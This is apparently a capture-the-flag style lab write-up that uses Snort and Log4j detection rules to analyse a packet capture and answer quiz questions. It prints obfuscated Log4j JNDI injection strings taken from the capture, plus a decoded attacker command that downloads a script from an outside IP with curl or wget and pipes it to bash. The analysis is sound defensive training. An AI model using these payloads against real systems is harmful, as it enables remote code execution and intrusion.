root@dco:~$ cd "/Desktop/Exercise-Files/TASK-8 (Log4j)"
root@dco:~$ ls 
 local-1.rules  local.rules  log4j.pcap
root@dco:~$ sudo snort -c local.rules -r log4j.pcap -A full -l .

#perform log analysis on the alert file
root@thm:~$ ls
 alert  local-1.rules  local.rules  log4j.pcap  snort.log.1736290032
root@thm:~$ cat alert
 ...
 [**] [1:21003726:1] FOX-SRT – Exploit – Possible Apache Log4J RCE Request Observed (CVE-2021-44228) [**]
root@thm:~$ grep -E [\[\*\*\]] alert | sort | uniq
 [**] [1:21003726:1] FOX-SRT – Exploit – Possible Apache Log4J RCE Request Observed (CVE-2021-44228) [**]
 [**] [1:21003728:1] FOX-SRT – Exploit – Possible Apache Log4J RCE Request Observed (CVE-2021-44228) [**]
 [**] [1:21003730:1] FOX-SRT – Exploit – Possible Defense-Evasive Apache Log4J RCE Request Observed (CVE-2021-44228) [**]
 [**] [1:21003731:1] FOX-SRT – Exploit – Possible Defense-Evasive Apache Log4J RCE Request Observed (URL encoded bracket) (CVE-2021-44228) [**]

root@thm:~$ grep -E [\[\*\*\]] alert | sort | uniq | wc -l
 4
root@thm:~$ rm -rf alert snort.log.1736108145

Use the given rule file (local.rules) to investigate the log4j exploitation. Investigate the log/alarm files. What are the first six digits of the triggered rule sids?

root@dco:~$ cd "/Desktop/Exercise-Files/TASK-8 (Log4j)"
root@dco:~$ ls
 local-1.rules  local.rules  log4j.pcap
root@dco:~$ cat local-1.rules
 * alert tcp any any -> any any (msg:"FOX-SRT – Exploit – Possible Apache Log4J RCE Request Observed (CVE-2021-44228)"; flow:established, to_server; content:"${jndi:ldap://"; fast_pattern:only; flowbits:set, fox.apachelog4j.rce; priority:3; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; metadata:CVE 2021-44228; metadata:created_at 2021-12-10; metadata:ids suricata; sid:21003726; rev:1;) 
   alert tcp any any -> any any (msg:"FOX-SRT – Exploit – Possible Apache Log4J RCE Request Observed (CVE-2021-44228)"; flow:established, to_server; content:"${jndi:"; fast_pattern; pcre:"/\$\{jndi\:(rmi|ldaps|dns)\:/"; flowbits:set, fox.apachelog4j.rce; threshold:type limit, track by_dst, count 1, seconds 3600;  priority:3; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; metadata:CVE 2021-44228; metadata:created_at 2021-12-10; metadata:ids suricata; sid:21003728; rev:1;) 
   alert tcp any any -> any any (msg:"FOX-SRT – Exploit – Possible Defense-Evasive Apache Log4J RCE Request Observed (CVE-2021-44228)"; flow:established, to_server; content:"${jndi:"; fast_pattern; content:!"ldap://"; flowbits:set, fox.apachelog4j.rce; threshold:type limit, track by_dst, count 1, seconds 3600;  priority:3; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; reference:url, twitter.com/stereotype32/status/1469313856229228544; metadata:CVE 2021-44228; metadata:created_at 2021-12-10; metadata:ids suricata; sid:21003730; rev:1;) 
   alert tcp any any -> any any (msg:"FOX-SRT – Exploit – Possible Defense-Evasive Apache Log4J RCE Request Observed (URL encoded bracket) (CVE-2021-44228)"; flow:established, to_server; content:"%7bjndi:"; nocase; fast_pattern; flowbits:set, fox.apachelog4j.rce; threshold:type limit, track by_dst, count 1, seconds 3600;  priority:3; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; reference:url, https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; sid:21003731; rev:1;) 
   alert tcp any any -> any any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in HTTP Header"; flow:established, to_server; content:"${"; http_header; fast_pattern; content:"}"; http_header; distance:0; flowbits:set, fox.apachelog4j.rce.loose;  priority:3; threshold:type limit, track by_dst, count 1, seconds 3600; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; reference:url, https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; sid:21003732; rev:1;) 
   alert tcp any any -> any any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in URI"; flow:established,to_server; content:"${"; http_uri; fast_pattern; content:"}"; http_uri; distance:0; flowbits:set, fox.apachelog4j.rce.loose;  priority:3; threshold:type limit, track by_dst, count 1, seconds 3600; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; reference:url, https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; sid:21003733; rev:1;) 

   # Better and stricter rules, also detects evasion techniques
   alert tcp any any -> any any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in HTTP Header (strict)"; flow:established,to_server; content:"${"; http_header; fast_pattern; content:"}"; http_header; distance:0; pcre:"/(\$\{\w+:.*\}|jndi)/Hi"; reference:url,www.lunasec.io/docs/blog/log4j-zero-day/; reference:url,https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; priority:3; sid:21003734; rev:1;) 
   alert tcp any any -> any any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in URI (strict)"; flow:established, to_server; content:"${"; http_uri; fast_pattern; content:"}"; http_uri; distance:0; pcre:"/(\$\{\w+:.*\}|jndi)/Ui"; reference:url,https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; priority:3; sid:21003735; rev:1;) 
   alert tcp any any -> any any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in Client Body (strict)"; flow:to_server; content:"${"; http_client_body; fast_pattern; content:"}"; http_client_body; distance:0; pcre:"/(\$\{\w+:.*\}|jndi)/Pi"; flowbits:set, fox.apachelog4j.rce.strict; reference:url,www.lunasec.io/docs/blog/log4j-zero-day/; reference:url,https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-12; metadata:ids suricata; priority:3; sid:21003744; rev:1;)
 
#test user-created rule by reading pcaps - this will generate snort log files
root@dco:~$ cd "/Desktop/Exercise-Files/TASK-8 (Log4j)"
root@dco:~$ ls 
 local-1.rules  local.rules  log4j.pcap
root@dco:~$ sudo snort -c local.rules -r log4j.pcap -A full -l .

#perform log analysis on the alert file
root@thm:~$ ls
 alert  local-1.rules  local.rules  log4j.pcap  snort.log.1736290032

root@thm:~$ grep -E sid\: local.rules
 [**] [1:21003726:1] FOX-SRT – Exploit – Possible Apache Log4J RCE Request Observed (CVE-2021-44228) [**]
 [**] [1:21003728:1] FOX-SRT – Exploit – Possible Apache Log4J RCE Request Observed (CVE-2021-44228) [**]
 [**] [1:21003730:1] FOX-SRT – Exploit – Possible Defense-Evasive Apache Log4J RCE Request Observed (CVE-2021-44228) [**]
 [**] [1:21003731:1] FOX-SRT – Exploit – Possible Defense-Evasive Apache Log4J RCE Request Observed (URL encoded bracket) (CVE-2021-44228) [**]

root@thm:~$ grep -Eo "sid:[0-9]+" local.rules
 sid:21003726
 sid:21003728
 sid:21003730
 sid:21003731
 sid:21003732
 sid:21003733
 sid:21003734
 sid:21003735
 sid:21003744
root@thm:~$ rm -rf alert snort.log.1736108145

Use local-1.rules empty file to write a new rule to detect packet payloads between 770 and 855 bytes. What is the number of detected packets?

#write a rule based on specification - Snort 3 Rule Writing Guide
root@thm:~$ BROWSER > https://docs.snort.org/welcome
 Search: payload size
  - https://docs.snort.org/rules/options/payload/dsize.html?highlight=payload%20size#dsize

root@dco:~$ cd "/Desktop/Exercise-Files/TASK-8 (Log4j)"
root@dco:~$ ls
 local-1.rules  local.rules  log4j.pcap
root@dco:~$ cat local-1.rules
 * empty rule file
  
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@dco:~$ nano /etc/snort/rules/local.rules
 alert tcp any any <> any any (msg:"Payload size between 770 and 855 bytes"; dsize:770<>855; sid:100001; rev:1;)

#test user-created rule by reading pcaps - this will generate snort log files
root@dco:~$ cd "/Desktop/Exercise-Files/TASK-8 (Log4j)"
root@dco:~$ ls 
 local-1.rules  local.rules  log4j.pcap
root@dco:~$ snort -c local-1.rules -r log4j.pcap -A full -l .

#perform log analysis on the alert file
root@thm:~$ ls
 alert  local-1.rules  local.rules  log4j.pcap  snort.log.1736294444
root@thm:~$ cat alert
 ...
 [**] [1:100001:2] Payload size between 770 and 855 bytes [**]
root@thm:~$ grep -E [\[\*\*\]] alert | wc -l
 41

Use local-1.rules empty file to write a new rule to detect packet payloads between 770 and 855 bytes. What is the name of the used encoding algorithm?

#write a rule based on specification - Snort 3 Rule Writing Guide
root@thm:~$ BROWSER > https://docs.snort.org/welcome
 Search: payload size
  - https://docs.snort.org/rules/options/payload/dsize.html?highlight=payload%20size#dsize

root@dco:~$ cd "/Desktop/Exercise-Files/TASK-8 (Log4j)"
root@dco:~$ ls
 local-1.rules  local.rules  log4j.pcap
root@dco:~$ cat local-1.rules
 * empty rule file
  
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@dco:~$ nano /etc/snort/rules/local.rules
 alert tcp any any <> any any (msg:"Payload size between 770 and 855 bytes"; dsize:770<>855; sid:100001; rev:1;)

#test user-created rule by reading pcaps - this will generate snort log files
root@dco:~$ cd "/Desktop/Exercise-Files/TASK-8 (Log4j)"
root@dco:~$ ls 
 local-1.rules  local.rules  log4j.pcap
root@dco:~$ snort -c local-1.rules -r log4j.pcap -A full -l .

#perform log analysis on the alert file
root@thm:~$ ls
 alert  local-1.rules  local.rules  log4j.pcap  snort.log.1736294444
root@thm:~$ cat alert
 ...
 [**] [1:100001:2] Payload size between 770 and 855 bytes [**]
root@thm:~$ strings snort.log.1736294444
 Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://45.155.205.233:12344/Basic/Command/Base64/KGN1c...

Use local-1.rules empty file to write a new rule to detect packet payloads between 770 and 855 bytes. What is the IP ID of the corresponding packet?

#write a rule based on specification - Snort 3 Rule Writing Guide
root@thm:~$ BROWSER > https://docs.snort.org/welcome
 Search: payload size
  - https://docs.snort.org/rules/options/payload/dsize.html?highlight=payload%20size#dsize

root@dco:~$ cd "/Desktop/Exercise-Files/TASK-8 (Log4j)"
root@dco:~$ ls
 local-1.rules  local.rules  log4j.pcap
root@dco:~$ cat local-1.rules
 * empty rule file
  
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@dco:~$ nano /etc/snort/rules/local.rules
 alert tcp any any <> any any (msg:"Payload size between 770 and 855 bytes"; dsize:770<>855; sid:100001; rev:1;)

#test user-created rule by reading pcaps - this will generate snort log files
root@dco:~$ cd "/Desktop/Exercise-Files/TASK-8 (Log4j)"
root@dco:~$ ls 
 local-1.rules  local.rules  log4j.pcap
root@dco:~$ snort -c local-1.rules -r log4j.pcap -A full -l .

#perform log analysis on the alert file
root@thm:~$ ls
 alert  local-1.rules  local.rules  log4j.pcap  snort.log.1736294444
root@thm:~$ cat alert
 ...
 [**] [1:100001:2] Payload size between 770 and 855 bytes [**]
root@thm:~$ strings snort.log.1736294444
 Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://45.155.205.233:12344/Basic/Command/Base64/KGN1c...

root@thm:~$ snort -r snort.log.1736294444 -X
 * find the id with the string "Referer: ...Base64"
    - ID:62808

Use local-1.rules empty file to write a new rule to detect packet payloads between 770 and 855 bytes. Decode the encoded command. What is the attacker's command?

#write a rule based on specification - Snort 3 Rule Writing Guide
root@thm:~$ BROWSER > https://docs.snort.org/welcome
 Search: payload size
  - https://docs.snort.org/rules/options/payload/dsize.html?highlight=payload%20size#dsize

root@dco:~$ cd "/Desktop/Exercise-Files/TASK-8 (Log4j)"
root@dco:~$ ls
 local-1.rules  local.rules  log4j.pcap
root@dco:~$ cat local-1.rules
 * empty rule file
  
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@dco:~$ nano /etc/snort/rules/local.rules
 alert tcp any any <> any any (msg:"Payload size between 770 and 855 bytes"; dsize:770<>855; sid:100001; rev:1;)

#test user-created rule by reading pcaps - this will generate snort log files
root@dco:~$ cd "/Desktop/Exercise-Files/TASK-8 (Log4j)"
root@dco:~$ ls 
 local-1.rules  local.rules  log4j.pcap
root@dco:~$ snort -c local-1.rules -r log4j.pcap -A full -l .

#perform log analysis on the alert file
root@thm:~$ ls
 alert  local-1.rules  local.rules  log4j.pcap  snort.log.1736294444
root@thm:~$ cat alert
 ...
 [**] [1:100001:2] Payload size between 770 and 855 bytes [**]
root@thm:~$ strings snort.log.1736294444 | grep -i Base64
 GET /?x=${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNjIuMC4yMjguMjUzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE2Mi4wLjIyOC4yNTM6ODApfGJhc2g=} HTTP/1.1
 User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNjIuMC4yMjguMjUzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE2Mi4wLjIyOC4yNTM6ODApfGJhc2g=}
 Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNjIuMC4yMjguMjUzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE2Mi4wLjIyOC4yNTM6ODApfGJhc2g=}

root@thm:~$ echo -n "KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNjIuMC4yMjguMjUzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE2Mi4wLjIyOC4yNTM6ODApfGJhc2g=" | base64 -d
 (curl -s 45.155.205.233:5874/162.0.228.253:80||wget -q -O- 45.155.205.233:5874/162.0.228.253:80)|bash

What is the CVSS v2 score of the Log4j vulnerability?

root@thm:~$ BROWSER > google.com
 Search: cvss v2 score log4j
  - https://nvd.nist.gov/vuln/detail/cve-2021-44228
   
 * NIST: NVD   Base Score: 9.3 HIGH   Vector:  (AV:N/AC:M/Au:N/C:C/I:C/A:C)

PreviousNETWORK SECURITY & TRAFFIC ANALYSIS NextSNORT CHALLENGE (LIVE ATTACKS)

Last updated 11 months ago